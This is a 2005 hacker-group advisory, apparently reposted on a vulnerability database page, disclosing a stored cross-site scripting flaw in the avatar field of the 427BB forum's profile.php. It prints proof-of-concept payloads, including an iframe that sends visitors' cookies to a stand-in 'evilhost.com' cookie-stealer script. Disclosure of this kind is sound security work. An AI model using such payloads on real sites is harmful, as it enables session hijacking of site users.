`
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG006
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any
damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
Vulnerable: 427BB (Any Version)
---
General Information:
427BB Is a simple board and I have no idea why I'm
releasing this because Its very unpopular but what
the hell. Its based on PHP And MySQL
---
Description:
In profile.php there is a avatar field that is
vulnerable to a XSS attack by a remote attacker. The
Avatar string isn't filtered of < >. This makes is
very easy for a attacker to steal a session.
---
PoC Code
Place the following code into the avatar field and
save it then reload the profile page and it will
execute this code.
"><script
language="javascript">alert("b00");</script><"
Some more code this by Blademaster
"><iframe
SRC="http://www.evilhost.com/cookiestealer.php?cookie="
WIDTH=1 HEIGHT=1></iframe><"
---
Fix and Vendor status:
Vendor has been notified, expect official patch
soon.
---
Greetz:
All the people at hackerlounge.com, JWT,
TGS-Security.com and JWT-Security.net.
Specifically:
Th3_R@v3n (me), Dlab, Riddick, Enjoi, Blademaster,
Modzilla, Pingu, Jake Johnson, Afterburn, airo,
cardiaC, chis, ComputerGeek, deep_phreeze, dudley,
evasion, eXtacy, Mattewan, Afterburn,
Thanatos_Starfire, Roz, Sirross, UmInAsHoE, Infinite,
Slarty, NoUse, Snake (I hate you), Surreal (I hate
you), -=Vanguard=-, The_IRS, puNKiey, driedice,
Carnuss, oKiDaN, Mr.Mind, dementis, net-RIDER,
voteforpedro, Cryptic_Override, kodaxx,
~CreEpy~NoDquE~, Brainscan, the_exode,
phillysteak12345, DerrtyJake, =>HeX<=, m0rk, and
anyone else I forgot.
---
Credit:
HRG - Hackerlounge Research Group
http://www.Hackerlounge.com
Partial credit is also given to
lancastertechnologies.org, founded by JWT.
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
[]
[] HRG - Hackerlounge Research Group
[] Release: HRG006
[] Monday 03/01/05
[] 427BB
[]
[] The author can't be held responsible for any
damage
[] done by a reader. You have your own resonsibility
[] Please use this document like it's meant to.
[]
[][][][][][][][][][][][][][][][][][][][][][][][][][]
[][][]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation